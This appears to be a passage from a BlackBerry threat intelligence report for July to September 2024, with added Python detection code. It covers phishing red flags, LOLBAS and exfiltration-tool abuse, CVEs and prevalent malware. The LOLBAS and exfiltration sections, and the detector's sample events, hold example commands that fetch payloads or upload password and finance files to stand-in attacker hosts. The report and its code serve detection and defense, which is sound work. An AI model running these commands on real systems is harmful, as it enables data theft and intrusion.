  • Example: An international retailer significantly reduces its phishing incidents by launching a comprehensive training program coupled with a robust patch management system to address vulnerabilities promptly.
  • It only takes one employee to click on a malicious link to compromise an organization’s systems and infrastructure. Here’s a sample phishing message to incorporate into your training.
Figure 13a: Typical connection request an employee might receive.
However, a closer look reveals the typical traits of a phishing email (Figure 13b):
Figure 13b: Red flags to look out for in a phishing email.
  1. The sender's email address claims to be from "linkedincdn.com" rather than the official LinkedIn.com domain — this is a classic domain spoofing technique.
  2. There's a warning banner indicating this is from an external source. This is a helpful security feature that many organizations choose to implement.
  3. The message uses two classic social engineering tactics. It claims to be from a high-level executive (CISO) at the target’s organization and uses flattery ("have heard great things about you") to encourage engagement.
  4. The copy contains inconsistent formatting: spelling and grammar irregularities can be found throughout.
  5. Although the profile photo makes it seem genuine, these can be easily copied off a legitimate profile by anyone who knows how to right click and select “Save Image As.”
  6. The email’s overall appearance mimics common automated messages emailed to users by social media sites.
    • The "Accept" and "View Profile" buttons are likely to be malicious links that could lead to credential harvesting pages or malware downloads.
    • The "Unsubscribe" link at the bottom may also be malicious. Phishers often include these to appear legitimate while actually leading users to more harmful content.

Help your employees learn to:

  • Verify sender email domains carefully.
  • Be suspicious of unsolicited connection requests, particularly from high-ranking executives.
  • Never click on buttons or links in suspicious emails — they should instead visit the referenced site by typing the URL directly into their browser.
  • Pay attention to security warnings from their email system.
  • Be wary of flattery or urgency in unexpected professional networking requests.
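The first two habits in this list (verify the sender domain, heed the external-sender banner) together with the executive-impersonation and flattery cues from Figure 13b, written as an added checker that a training program or mail-gateway rule could call. This is example code, not from the report; the brand allow-list, addresses and message text are constructed.

```python
"""Sender-domain and social-engineering checks for the training scenario above."""
import re
from email.utils import parseaddr
from typing import Dict, List, Set

# Brand -> domains that genuinely send that brand's mail. Constructed allow-list;
# in practice it comes from your own verified vendor inventory.
OFFICIAL_DOMAINS: Dict[str, Set[str]] = {"linkedin": {"linkedin.com"}}

EXEC_TITLE_RE = re.compile(r"\b(ciso|ceo|cfo|cto|chief \w+ officer)\b")
FLATTERY_PHRASES = ("heard great things", "impressed by your", "your excellent work")


def sender_domain(header_from: str) -> str:
    """Domain of a From: header such as 'LinkedIn <invitations@linkedincdn.com>'."""
    _, addr = parseaddr(header_from)
    return addr.rpartition("@")[2].lower().rstrip(".")


def is_official(domain: str, official: Set[str]) -> bool:
    """Exact match or a genuine subdomain; 'linkedin.com.evil.net' must fail."""
    return any(domain == d or domain.endswith("." + d) for d in official)


def classify_domain(domain: str, claimed_brand: str) -> str:
    """'official', 'lookalike' (brand string inside another domain) or 'unrelated'."""
    official = OFFICIAL_DOMAINS.get(claimed_brand.lower(), set())
    if is_official(domain, official):
        return "official"
    return "lookalike" if claimed_brand.lower() in domain else "unrelated"


def red_flags(header_from: str, claimed_brand: str, body: str,
              external_banner: bool) -> List[str]:
    """Return the human-readable red flags found in one message."""
    flags: List[str] = []
    domain = sender_domain(header_from)
    verdict = classify_domain(domain, claimed_brand)
    if verdict != "official":
        flags.append(f"{verdict} sender domain: {domain}")
    text = body.lower()
    if EXEC_TITLE_RE.search(text):
        # A "colleague" writing from outside the organization is the tell in Figure 13b.
        note = " although the mail carries an external-sender banner" if external_banner else ""
        flags.append("claims to come from a senior executive" + note)
    if any(p in text for p in FLATTERY_PHRASES):
        flags.append("flattery used to encourage engagement")
    return flags


# Constructed sample modelled on the connection request in Figure 13a.
SAMPLE_FROM = "LinkedIn <invitations@linkedincdn.com>"
SAMPLE_BODY = ("Hi, I'm the CISO at your company and have heard great things "
               "about you. Accept | View Profile | Unsubscribe")

if __name__ == "__main__":
    for flag in red_flags(SAMPLE_FROM, "LinkedIn", SAMPLE_BODY, external_banner=True):
        print("RED FLAG:", flag)
```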

Cybercriminals continually refine their cyberattacks to enhance their impact. To defend against these evolving threats, organizations must adopt a forward-looking approach to cybersecurity defense strategies. That includes investing strategically in technologies — such as security monitoring, staff training and incident response — to ensure they are prepared for sophisticated cyberthreats.

Cyber Story Highlight: Coyote Banking Trojan Targets Latin America, Focuses on Brazilian Financial Institutions

In July 2024, BlackBerry researchers uncovered a campaign in which Coyote was deployed to target Brazilian banks and cryptocurrency exchanges. The rising trend of geo-targeted banking trojans stresses the need for robust cybersecurity and user education to combat phishing and social engineering threats like Coyote. In the Mitigations section of this report, you will find additional actionable security ideas to share within your organization.

CylanceMDR: Threats and Mitigations

Organizations face threats not only from threat actors’ malware, but also from the misuse of legitimate tools. This section highlights the most prevalent threats the CylanceMDR™ team has encountered in customer network environments this quarter, as well as mitigations that organizations can use to strengthen their cyber defenses.

CylanceMDR is our subscription-based MDR service that provides 24x7 monitoring and helps organizations stop sophisticated cyberthreats by filling gaps in security environments.

LOLBAS Activity


LOLBAS refers to built-in Windows system tools and legitimate executables that attackers can abuse for malicious purposes. The term "living off the land" means using tools that are already present in the target environment (“the land”), rather than risk introducing new malware that may trigger security systems and alert the target to the fact they’ve been compromised. The danger of LOLBAS-based attacks lies in their ability to bypass security controls since they use legitimate system tools. This makes detection challenging as system activities may appear normal at first glance.

During this reporting period, the following LOLBAS activity was observed:

  • Bitsadmin continues to be the most observed LOLBAS.
  • Certutil is the second most-observed, although its use has decreased since the last reporting period.
  • Regsvr32, MSHTA and PsExec have also been observed but make up a low percentage of overall activity.

Below, we illustrate an example of malicious LOLBAS usage.

Figure 14: LOLBAS activity, July – September 2024.

File: Bitsadmin.exe

MITRE ATT&CK ID: T1197 | T1105
How It Can Be Abused: Download/upload from or to malicious host (Ingress tool transfer). Can be used to execute malicious process.
Example Command-Line:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest

File: mofcomp.exe

MITRE ATT&CK ID: T1218
How It Can Be Abused: Can be used to install malicious managed object format (MOF) scripts.
MOF statements are parsed by the mofcomp.exe utility and will add the classes and class instances defined in the file to the WMI repository.
Example Command-Line:
mofcomp.exe \\<AttackerIP>\content\BBwmi[.]mof

Exfiltration Tools


Exfiltration tools are software used to transfer data out of a target environment, often for malicious purposes. This quarter, the CylanceMDR team reviewed the most prevalent tools that could be used for exfiltration (not including RMM tools) in our customer environments.

Figure 15: Percentage of exfiltration tools abused, July – September 2024.

WinSCP

Description: WinSCP is a file transfer client; PuTTY is a secure shell (SSH) client.

Example Command-Line: winscp.exe scp://test: P@ss123[at]EvilHost[.]com:2222/ /upload passwords.txt /defaults=auto

Note: Commonly used with a graphical user interface (GUI).

MITRE ATT&CK ID: T1048

PSCP

Description: PuTTY Secure Copy Protocol (PSCP) is a command-line utility used for transferring files and folders.

Example Command-Line: pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp

MITRE ATT&CK ID: T1021.004

FileZilla

Description: FileZilla is a well-known file transfer protocol (FTP) tool that can be used across various operating systems.

Example Command-Line: filezilla.exe -u “ftp://test:p@ss1234[at]ftp.test[.]com” -e “put passwords.txt /remote_directory/pass.txt”

MITRE ATT&CK ID: T1071.002

FreeFileSync

Description: FreeFileSync is a synchronization tool that can be used to manage backups.

Example Command-Line: FreeFileSync.exe google_drive_sync.ffs_batch

Note: The batch file will contain information regarding the file/folder and the location of the GDrive folder, e.g., <Left Path="C:\sensitiveFiles" /> <Right Path="D:\GoogleDriveFolder" />

MITRE ATT&CK ID: T1567.002

Rclone
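The command-line patterns shown in the LOLBAS Activity and Exfiltration Tools sections above, encoded as detection rules and run over constructed process-creation events. This is an added example, not CylanceMDR code; hosts, URLs, paths and user names are made up, and the ATT&CK IDs for certutil, regsvr32 and mshta are the standard ones rather than values quoted in the report.

```python
"""Flag LOLBAS and exfiltration-tool abuse in process-creation telemetry."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass(frozen=True)
class Finding:
    host: str
    image: str
    technique: str
    label: str


# (image name, ATT&CK ID, label, predicate on the lower-cased command line).
# Each predicate requires the abusive shape, so routine admin use of the same
# binary (bitsadmin /list, mofcomp on a local .mof) is not flagged.
RULES: List[Tuple[str, str, str, Callable[[str], bool]]] = [
    ("bitsadmin.exe", "T1197 | T1105", "BITS transfer to or from a URL",
     lambda c: "/transfer" in c and re.search(r"https?://", c) is not None),
    ("certutil.exe", "T1105", "certutil fetching or decoding a payload",
     lambda c: re.search(r"-urlcache|-decode", c) is not None),
    ("regsvr32.exe", "T1218.010", "regsvr32 loading a remote scriptlet",
     lambda c: "scrobj.dll" in c or re.search(r"/i:\S*https?://", c) is not None),
    ("mshta.exe", "T1218.005", "mshta running remote or inline script",
     lambda c: re.search(r"https?://|javascript:|vbscript:", c) is not None),
    ("mofcomp.exe", "T1218", "MOF file compiled from a network share",
     lambda c: re.search(r"\\\\[\w.-]+\\", c) is not None),
    ("winscp.exe", "T1048", "WinSCP scripted upload",
     lambda c: re.search(r"\b(s?ftp|scp)://", c) is not None and "/upload" in c),
    ("pscp.exe", "T1021.004", "PSCP copy to a remote host",
     lambda c: re.search(r"\S+@\S+", c) is not None),
    ("filezilla.exe", "T1071.002", "FileZilla scripted put",
     lambda c: "ftp://" in c and re.search(r"-e\s+\"?put\b", c) is not None),
    ("freefilesync.exe", "T1567.002", "FreeFileSync batch job (cloud sync)",
     lambda c: ".ffs_batch" in c),
]


def image_name(path: str) -> str:
    """'C:\\Windows\\System32\\bitsadmin.exe' -> 'bitsadmin.exe'."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(events: List[Dict[str, str]]) -> List[Finding]:
    """Run every rule over events shaped like {"host", "image", "cmdline"}."""
    findings: List[Finding] = []
    for ev in events:
        name = image_name(ev["image"])
        cmd = ev["cmdline"].lower()
        for image, technique, label, matches in RULES:
            if name == image and matches(cmd):
                findings.append(Finding(ev["host"], name, technique, label))
    return findings


# Constructed sample telemetry following the example command lines above; the
# second bitsadmin and mofcomp events are benign controls that must not fire.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "WS-0412", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer defaultjob1 /download http://baddomain.example/bbtest/bbtest C:\Users\jdoe\AppData\Local\Temp\bbtest"},
    {"host": "WS-0412", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /list /allusers"},
    {"host": "SRV-07", "image": r"C:\Windows\System32\wbem\mofcomp.exe",
     "cmdline": r"mofcomp.exe \\10.0.0.5\content\BBwmi.mof"},
    {"host": "SRV-07", "image": r"C:\Windows\System32\wbem\mofcomp.exe",
     "cmdline": r"mofcomp.exe C:\Windows\System32\wbem\cimwin32.mof"},
    {"host": "WS-0199", "image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "cmdline": r"winscp.exe scp://test:P@ss123@evilhost.example:2222/ /upload passwords.txt /defaults=auto"},
    {"host": "WS-0199", "image": r"C:\Tools\pscp.exe",
     "cmdline": r"pscp.exe -P 22 C:\Finances.txt root@evildomain.example:/tmp"},
    {"host": "WS-0233", "image": r"C:\Program Files\FileZilla FTP Client\filezilla.exe",
     "cmdline": 'filezilla.exe -u "ftp://test:p@ss1234@ftp.test.example" -e "put passwords.txt /remote_directory/pass.txt"'},
    {"host": "WS-0233", "image": r"C:\Program Files\FreeFileSync\FreeFileSync.exe",
     "cmdline": "FreeFileSync.exe google_drive_sync.ffs_batch"},
]

if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"{f.host}: {f.image} -> {f.technique} ({f.label})")
```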

Remote Monitoring and Management Tools


Threat actors abuse RMM tools because they provide an easy way to maintain persistent access to systems and an efficient means of data exfiltration. As noted in our previous Global Threat Intelligence Report, this is the fastest-growing tool category among ransomware groups, which use these tools to exfiltrate data from victim environments. During this reporting period, the CylanceMDR team reviewed the most commonly abused RMM tools seen in our customer environments.

During our analysis, we noted that many customers use multiple RMM tools within their environments, increasing their organization’s attack surface and risk.

Figure 16: This chart illustrates the percentage of attacks executed by abusing leading RMM tools.


Suggested mitigations include:

1. Audit Remote Access Tools

  • Identify currently used RMM tools within the organization.
  • Confirm they are approved within the environment.
  • If using multiple RMM tools, determine if they can be consolidated. Reducing the number of different tools used reduces the risk.

2. Disable Ports and Protocols

  • Block inbound and outbound network communication to commonly used ports associated with non-approved remote access tools.
  • Use default deny rules and allow listing rather than a blocklist approach when it comes to firewall rules and application control.

3. Monitor Endpoint Activity and Network Traffic

  • Detect abnormal use of remote access tools.

4. Patching

  • Ensure regular review of vulnerabilities associated with allowed RMM tools used, updating as necessary.
  • Prioritize Internet accessible systems when doing regular patch cycles.

5. Network Segmentation

  • Minimize malicious lateral movement by segmenting the network, limiting access to devices and data.

6. Device Tagging

  • Find out if your security vendor provides options to tag devices that use RMM tools. If so, enable this to ensure your SOC has visibility. Some vendors provide options to leave a note/tag identifying approved tools/activities, which greatly helps analysts during investigations.

7. Memory-Loading RMM

  • Use security software that can detect remote access that is only loaded in memory.

CylanceMDR Top Quarterly Threats

The most prevalent threats detected and responded to by the CylanceMDR analyst team during this reporting period are listed below.
Figure 17: Most prevalent threats detected and responded to by the CylanceMDR analyst team this quarter.

Highlight: Alerts from the BlackBerry Incident Response Team

The BlackBerry Incident Response (IR) team provides mitigation for organizations that have suffered a malware attack or suspected data breach. During this quarter, our IR team witnessed an increase in attacks involving Internet-connected services and abuse of former employee credentials.

Internet-facing devices such as VPN devices were targeted more than usual this quarter. Unfortunately, these types of devices may not be sufficiently secured with multi-factor authentication. In some cases, this lack of MFA has enabled threat actors to deploy ransomware or other malware within a client’s environment and exfiltrate company data. This highlights the need for companies to properly secure all Internet-exposed systems in a timely manner (MITRE – External Remote Services) and to reduce the attack surface when possible, using modern alternatives like Zero Trust Network Access (ZTNA) solutions.

The abuse of former employees’ account credentials is another common attack vector. While employee credentials should be deprovisioned as soon as the worker leaves the company, this does not always happen. Old accounts can potentially give a threat actor full access to the organization’s network and systems. This underlines the need for companies to implement strong authentication security controls on all systems (MITRE – Valid Accounts).

Common Vulnerabilities and Exposures

Impact and Statistics

The Common Vulnerabilities and Exposures (CVEs) system offers a framework for identifying, standardizing and publicizing known security vulnerabilities and exposures. From July through September 2024, the National Institute of Standards and Technology (NIST) reported 8,659 new CVEs.

Although fewer CVEs were discovered this quarter compared to last, the level of criticality of these CVEs has increased significantly. Last quarter, 8% of CVEs had a severity score of 9.0 or above, whereas this quarter the percentage rose to a new high of 14%.

Figure 18: CVE Scoring July - September 2024.

The most critical CVEs logged this quarter:

CVE-2024-4879 (9.3 Critical) Arbitrary Code Execution: This ServiceNow vulnerability allows unauthenticated users to remotely execute code within the Now Platform. It involves a Jelly template injection vulnerability that exploits ServiceNow’s UI macros. This vulnerability can potentially be chained with CVE-2024-5178 (6.9 Medium) Unauthorized Access and CVE-2024-5217 (9.2 Critical) Arbitrary Code Execution, enabling unauthorized remote code execution on ServiceNow MID servers.

CVE-2024-43491 (9.8 Critical) Arbitrary Code Execution: Pertaining to Microsoft’s Service Stack, this vulnerability reintroduces previously mitigated vulnerabilities in Windows 10. It allows remote code execution without user interaction, potentially leading to full system compromise. Both a Service Stack update and a Windows security update have been released to patch this vulnerability.

CVE-2024-38194 (9.9 Critical) Authentication Bypass: This vulnerability arises from improper authorization within Azure web applications, allowing an authenticated attacker to elevate privileges over a network. If exploited, it could compromise the security of the applications and connected systems, leading to unauthorized data access, service disruption or malicious modification of application behavior.

CVE-2024-21416 (9.8 Critical) Arbitrary Code Execution: A Windows TCP/IP Remote Code Execution (RCE) vulnerability; exploitation could enable attackers to execute arbitrary code on the target system, potentially gaining full access.

CVE-2024-47575 (9.8 Critical) Authentication Bypass: Disclosed just outside the reporting period, the exploit known as “FortiJump” and tracked as CVE-2024-47575 involves zero-day attacks by the newly disclosed threat actor UNC5820. It abuses a flaw to execute API commands, allowing attackers to bypass authentication and execute commands on exploitable systems. Fortinet's October advisory stated that this vulnerability "may allow a remote unauthenticated attacker to execute arbitrary code or commands via specially crafted requests."

Prevalent Threats by Platform: Windows

FakeUpdates/SocGholish

Downloader

JavaScript-based downloader that presents fake browser updates to users. Known to download additional payloads including AZORult, GootLoader and RedLine.

Formbook/xLoader

Infostealer

Sophisticated malware operating as both an infostealer and a downloader. Employs anti-VM techniques, process injection and custom encryption routines to bypass cybersecurity defenses. Steals data from browsers, email clients and various applications.

QakBot

Botnet/Dropper

First discovered in 2008, now on version 5.0. Provides extensive capabilities for data exfiltration and lateral movement. Known to deliver multiple malware types post-installation.

Agent Tesla

Infostealer

.NET-based infostealer sold as MaaS primarily used for credential harvesting. Despite a 2023 FBI/DOJ infrastructure takedown, it has reemerged with new persistence mechanisms to survive host restoration.

njRAT

Remote Access Trojan

RAT focused on capturing user data, with capabilities including camera access, credential theft, file interaction monitoring and keystroke logging.

AsyncRAT

Remote Access Trojan

Typically delivered alongside other malware. Receives C2 server commands to capture user data and terminate specific processes. Features botnet capabilities.

LummaC2

Infostealer

C-based infostealer targeting commercial enterprise and critical infrastructure organizations. Focuses on sensitive data exfiltration and is distributed via underground forums and Telegram groups.

Remcos

Remote Access Trojan

Remote control and surveillance application designed for unauthorized remote access and device control.

RedLine

Infostealer

Employs various applications and services to exfiltrate victim data including credit card information, passwords and cookies.

Phorpiex

Botnet

Botnet focused on malware delivery, known for involvement in X-rated extortion campaigns.

Prevalent Threats by Platform: Linux

Mirai

Botnet

Remains highly active, with the latest version exploiting zero-day vulnerabilities in CCTV cameras. The "Corona" variant spreads through malicious code injection in compromised cameras.

Gafgyt/Bashlite

Botnet

IoT-focused Linux botnet using C2 servers for large-scale DDoS attacks. The latest version targets weak SSH passwords for GPU crypto mining.

Play Ransomware

Ransomware

New variant specifically targeting ESXi environments, marking the group's first expansion to Linux systems from its previous Windows-focused double extortion attacks. Selectively encrypts files in Linux ESXi environments.

Hadooken

Botnet

New Linux malware combining crypto mining capabilities with DDoS attack tools. Targets vulnerabilities in systems including Oracle WebLogic Server.

Prevalent Threats by Platform: macOS

Atomic Stealer (AMOS)

Infostealer

New variants disguised as various apps distributed via DMG disk images. Targets passwords, browser cookies, autofill data, crypto wallets and Mac keychain data.

Cthulhu

Infostealer

MaaS-based infostealer distributed as a trojan DMG. Post-infection activities include harvesting keychain passwords, browser cookies, Telegram account information, cryptocurrency wallets and user data for C2 server upload.

Macma

Backdoor

Recent updates attributed to Chinese APT group Evasive Panda. Establishes persistence before deploying keylogger and media capture capabilities for data exfiltration to C2 servers.

TodoSwift

Downloader

Distributed through Bitcoin pricing PDF decoys. Attributed to North Korean group BlueNoroff and capable of downloading additional malicious binaries through C2 server connections.

Prevalent Threats by Platform: Android

Necro Trojan

Downloader

Distributed via Google Play store and malicious software development kits (SDKs). Capabilities include launching invisible ads, downloading additional payloads, installing third-party applications, executing additional code and C2 server communication.

Octo2

Infostealer

Distributed through trojanized versions of NordVPN and Google Chrome. An Exobot variant that primarily targets bank account information with remote access capabilities and C2 server communication.

Ajina

Infostealer

Distributed through social engineering and phishing, particularly via Telegram. Steals banking credentials and SMS data to intercept 2FA authentication from banking applications.

Common MITRE Techniques

Understanding threat groups’ high-level techniques can aid in deciding which detection techniques to prioritize. BlackBerry observed the following 20 techniques being used by threat actors in this reporting period.

Figure 19: Top 20 observed MITRE Techniques, June – September 2024.

Detected Techniques

The following table shows the top 20 techniques used by threat actors this quarter. An upward arrow (↑) in the “Change” column indicates that usage of the technique has increased since our last report. A downward arrow (↓) indicates that usage has decreased since our last report. An equals (=) symbol indicates that the technique remains in the same position as in our last report.

Technique Name Technique ID Tactic Name Last Report Change
Hijack Execution Flow
T1574
Persistence, Privilege Escalation, Defense Evasion
1
=
DLL Side-Loading
T1574.002
Persistence, Privilege Escalation, Defense Evasion
2
=
Virtualization/
Sandbox Evasion
T1497
Defense Evasion, Discovery
NA
System Information Discovery
T1082
Discovery
5
Input Capture
T1056
Credential Access, Collection
4
Software Discovery
T1518
Discovery
6
=
Security Software Discovery
T1518.001
Discovery
7
=
Scheduled Task/Job
T1053
Execution, Persistence, Privilege Escalation
19
DLL Search Order Hijacking
T1574.001
Persistence, Privilege Escalation, Defense Evasion
NA
Process Injection
T1055
Defense Evasion, Privilege Escalation
3
Masquerading
T1036
Defense Evasion
10
Process Discovery
T1057
Discovery
8
Create or Modify System Process
T1543
Persistence, Privilege Escalation
NA
Windows Service
T1543.003
Persistence, Privilege Escalation
NA
Boot or Logon AutoStart Execution
T1547
Persistence, Privilege Escalation
14
Registry Run Keys/Startup Folder
T1547.001
Persistence, Privilege Escalation
15
File and Directory Discovery
T1083
Discovery
9
Remote System Discovery
T1018
Discovery
13
Command and Scripting Interpreter
T1059
Execution
NA
Impair Defenses
T1562
Defense Evasion
17

Prominent Adversary Techniques

This quarter, Hijack Execution Flow (T1574) emerged as the technique most used by adversaries, with its sub-technique DLL Side-Loading (T1574.002) ranking second. These methods involve attackers manipulating how the operating system executes programs, for example by side-loading DLLs, often to bypass security controls.
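One defender-side triage check for the side-loading pattern described above, as an added example that is not code from the BlackBerry report: given a process image path and the modules it loaded (constructed sample data below), flag any DLL that carries the name of a Windows system DLL but was loaded from outside the Windows directories. The set of system DLL names and the trusted directory list are assumptions standing in for an organization's own baseline.

```python
"""Triage helper for DLL side-loading candidates (ATT&CK T1574.002).

Added example, not code from the BlackBerry report. Given a process image path
and the modules it loaded, flag DLLs that carry a Windows system DLL's name but
were loaded from outside the Windows directories (classic side-loading layout).
"""
from pathlib import PureWindowsPath

# Assumption: names of DLLs that ship in System32 on a default Windows install.
# A real deployment would derive this set from a baseline of its own images.
SYSTEM_DLL_NAMES = {
    "version.dll", "dbghelp.dll", "wininet.dll", "userenv.dll", "cryptbase.dll",
    "msimg32.dll", "comctl32.dll", "ntdll.dll", "kernel32.dll",
}
# Directories from which a system DLL is expected to load (lower-cased).
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")

def is_trusted_dir(module_path: str) -> bool:
    """True if the module's directory is one of TRUSTED_DIRS or nested below one."""
    parent = str(PureWindowsPath(module_path).parent).lower()
    return any(parent == d or parent.startswith(d + "\\") for d in TRUSTED_DIRS)

def find_sideload_candidates(image_path: str, modules: list[str]) -> list[dict]:
    """Return one finding per module that reuses a system DLL name off-path."""
    image_dir = str(PureWindowsPath(image_path).parent).lower()
    findings = []
    for mod in modules:
        path = PureWindowsPath(mod)
        if path.name.lower() not in SYSTEM_DLL_NAMES or is_trusted_dir(mod):
            continue  # unknown name, or loaded from where it belongs
        colocated = str(path.parent).lower() == image_dir
        findings.append({
            "module": mod,
            # A copy beside the executable is the layout side-loading relies on.
            "severity": "high" if colocated else "medium",
            "colocated_with_exe": colocated,
        })
    return findings

# Constructed sample (paths fabricated): an installer that loaded version.dll
# from its own download folder instead of System32.
SAMPLE_IMAGE = r"C:\Users\alice\Downloads\Installer\setup.exe"
SAMPLE_MODULES = [
    r"C:\Windows\System32\ntdll.dll",
    r"C:\Windows\WinSxS\example_assembly_dir\comctl32.dll",  # WinSxS is trusted
    r"C:\Users\alice\Downloads\Installer\version.dll",      # system name, wrong place
    r"C:\Users\alice\Downloads\Installer\setup_ui.dll",     # vendor DLL, ignored
]
```

Running `find_sideload_candidates(SAMPLE_IMAGE, SAMPLE_MODULES)` yields a single high-severity finding for the off-path `version.dll`; the other modules are either trusted or carry no system DLL name.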

Also noteworthy is the rise of Virtualization/Sandbox Evasion (T1497) into the top three. The binaries studied to reach these conclusions indicate that the malware used by attackers had a strong anti-detection focus.

Detected Tactics

In this quarter the top three tactics are Defense Evasion, Privilege Escalation and Persistence, as shown in Figure 20.

 

Figure 20: MITRE ATT&CK Tactics, June - September 2024

Looking Forward

This 90-day report, covering July through September 2024, is designed to help you stay informed and prepared for future threats. High-profile crime groups, especially ransomware operators, are exploiting new vulnerabilities and finding value in targets both large and small. As the report notes, BlackBerry researchers observed nearly two million attacks stopped this quarter alone. This level of activity makes it crucial to stay current with the latest security news for your industry and region.

Here's what to expect in the months ahead:

Telecommunications Under Siege

The telecommunications sector emerged as a prime target in 2024, exemplified by the AT&T breach that compromised call and text records across their network. As we move into 2025, we expect attackers to increasingly target telecom infrastructure rather than individual devices, allowing them to intercept communications at scale. The Salt Typhoon incident demonstrated how sophisticated actors can exploit network-level vulnerabilities to bypass traditional security measures. This shift from device-specific malware to infrastructure-level attacks presents a critical challenge, as organizations must now rethink their approach to securing sensitive communications across public telecom networks.

Infostealers and Stolen Data on Black Markets

Throughout 2024, infostealers have been a predominant feature of our quarterly threat reports. Notorious infostealers have often ranked high on our Top Threats lists and have appeared numerous times in attacks across the globe. According to Interpol, there was a 40% increase in dark web sales of logs collected from infostealers in 2023. Heading into 2025, this figure is expected to rise further.

Patching and Exploitation

The exploitation of undisclosed or newly discovered vulnerabilities by threat actors, particularly ransomware gangs, is not a new phenomenon. However, the pace at which these CVEs are being exploited has made it increasingly challenging for IT professionals to keep up. This is particularly true in our hyper-connected world, with its myriad processes, applications and services. Cybercriminals are aware of this and actively seek to exploit any weaknesses in a business's IT infrastructure and security for gain.

During this reporting period, over 50% of all new CVEs scored above 7.0. The rapid exploitation of CVEs and the weaponization of proofs of concept (PoCs) are expected to remain significant challenges for the industry in the new year.

Ransomware Rebrands and Reemergence

Over the last few decades, law enforcement and cybersecurity professionals have been playing cat and mouse with ransomware developers and affiliates. However, as we mentioned in our section on Lynx ransomware, most groups are amalgamations of others, often rebranding and reusing other ransomware code or purchasing malicious code bases from other malware authors. This trend of rebranding, reemergence and reuse of ransomware will likely continue as the barrier to entry into the cybercrime space keeps falling.

North Korean Remote Workers and False Identities

North Korean spies reportedly tried to infiltrate Western IT companies by posing as remote workers. These cybercriminals carefully crafted false identities, demonstrated the required skills to pass job interviews and tests, and masked their geolocations to avoid appearing as North Korean. In some cases, they used deepfake technology. Once hired, they attempted to exfiltrate internal data and install remote access utilities.

We predict that this trend of falsifying identities to infiltrate organizations will continue into 2025. North Korea has likely deployed more of these covert operatives who have yet to be discovered, and they will likely evolve their tactics to better evade detection.

Visit the BlackBerry blog to stay current with evolving cybersecurity threats and defenses.

Legal Disclaimer

The information contained in the BlackBerry Global Threat Intelligence Report is intended for informational purposes only. BlackBerry does not guarantee or take responsibility for the accuracy, completeness and reliability of any third-party statements or research referenced herein. The analysis expressed in this report reflects the current understanding of available information by our research analysts and may be subject to change as additional information is made known to us. Readers are responsible for exercising their own due diligence when applying this information to their private and professional lives. BlackBerry does not condone any malicious use or misuse of information presented in this report.